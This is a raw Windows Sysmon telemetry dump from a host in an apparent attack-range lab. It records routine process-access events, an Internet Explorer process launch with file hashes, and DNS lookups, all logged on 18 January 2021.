Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+170f46|C:\Windows\System32\windows.storage.dll+1411fc|C:\Windows\System32\windows.storage.dll+140fd8|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+170f34|C:\Windows\System32\windows.storage.dll+1411fc|C:\Windows\System32\windows.storage.dll+140fd8|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+170f34|C:\Windows\System32\windows.storage.dll+1411fc|C:\Windows\System32\windows.storage.dll+140fd8|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.257{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\iertutil.dll+36dd1|C:\Windows\SYSTEM32\iertutil.dll+36980|C:\Windows\SYSTEM32\iertutil.dll+34bac|C:\Windows\SYSTEM32\iertutil.dll+34f5f|C:\Windows\SYSTEM32\iertutil.dll+48078|C:\Windows\SYSTEM32\IEFRAME.dll+2bb302|C:\Windows\SYSTEM32\IEFRAME.dll+1174d|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet 
Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.226{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:40.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:40.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.148{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\iertutil.dll+26f4c|C:\Windows\SYSTEM32\iertutil.dll+28043|C:\Windows\SYSTEM32\iertutil.dll+36911|C:\Windows\SYSTEM32\iertutil.dll+34bac|C:\Windows\SYSTEM32\iertutil.dll+34f5f|C:\Windows\SYSTEM32\iertutil.dll+48078|C:\Windows\SYSTEM32\IEFRAME.dll+2bb302|C:\Windows\SYSTEM32\IEFRAME.dll+1174d|C:\Windows\SYSTEM32\IEFRAME.dll+129b8|C:\Windows\SYSTEM32\IEFRAME.dll+12c00|C:\Windows\SYSTEM32\IEFRAME.dll+13101|C:\Windows\SYSTEM32\IEFRAME.dll+2a8506|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet 
Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.137{59A5CD1D-9410-6005-0E05-00000000A301}6584C:\Program Files (x86)\Internet Explorer\iexplore.exe11.00.14393.2007 (rs1_release.171231-1800)Internet ExplorerInternet ExplorerMicrosoft CorporationIEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6476 CREDAT:82945 /prefetch:2C:\Users\Administrator\Desktop\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=7D930D55986DF5C69CF1A9C2DE7E33B3,SHA256=BEBB0D2229700C6A62B7811985061DC75F6279AB0FF8747C47CCADB6CC2CC462,IMPHASH=E7542C041AAD637F8E6918BBE235A488{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" 22542200x800000000000000013243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.168{59A5CD1D-8E56-6005-2E00-00000000A301}246414.128.139.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.944{59A5CD1D-93FA-6005-FC04-00000000A301}3784client.wns.windows.com0type: 5 wns.notify.windows.com.akadns.net;type: 5 emea1.notify.windows.com.akadns.net;type: 5 par02p.wns.notify.trafficmanager.net;::ffff:51.103.5.159;C:\Windows\explorer.exe 10341000x800000000000000013241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:40.101{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.086{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37846072C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet 
Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b0dc0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:41.179{59A5CD1D-93FA-6005-FC04-00000000A301}37845216C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.452{59A5CD1D-8E56-6005-2E00-00000000A301}2464159.5.103.51.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.444{59A5CD1D-8E56-6005-2E00-00000000A301}24648.31.126.40.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x800000000000000013282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:42.570{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000013281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:42.570{59A5CD1D-8E56-6005-2A00-00000000A301}28643692C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000013280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:42.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:42.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 